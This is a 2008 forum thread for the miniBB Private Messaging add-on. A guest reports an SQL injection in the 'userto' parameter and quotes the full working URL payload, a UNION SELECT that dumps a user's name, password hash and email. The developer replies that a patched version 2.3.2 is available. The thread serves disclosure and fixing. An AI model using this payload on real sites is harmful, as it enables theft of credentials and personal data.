pMail SQL Inj Bug (userto)

Thank you for reporting this bug.

Private Messaging add-on was first programmed in the era when vulnerabilities like this were not available at all. So I would agree, in some add-ons, errors like this may be still discovered, because I am unable to handle every possible hacking attempt. But during of the non-open-source nature of this add-on, they are discovered much slower then in default miniBB or free plugins.

I have updated PM add-on under customers area (version 2.3.2), so purchasers are welcome to re-download and update addon_pmail.php file.

	Guest
		#1 \| Posted: 1 Dec 2008 23:11
		Someone just showed me this in my forum. /index.php?userto=%27%20union%20select%20concat_ws(0x3a,username,user_password,user_email,user_icq),2%20from%20table_use rs%20 where%20user_id%20=%201--%20f&step=sendmsg&action=pmail This shows all the users info. There is def. an sql vuln with the userto variable and maybe more. Any quick fix would help out?

	Paul CEO
		#2 \| Posted: 2 Dec 2008 03:03 \| Edited by: Paul
		Thank you for reporting this bug. Private Messaging add-on was first programmed in the era when vulnerabilities like this were not available at all. So I would agree, in some add-ons, errors like this may be still discovered, because I am unable to handle every possible hacking attempt. But during of the non-open-source nature of this add-on, they are discovered much slower then in default miniBB or free plugins. I have updated PM add-on under customers area (version 2.3.2), so purchasers are welcome to re-download and update addon_pmail.php file.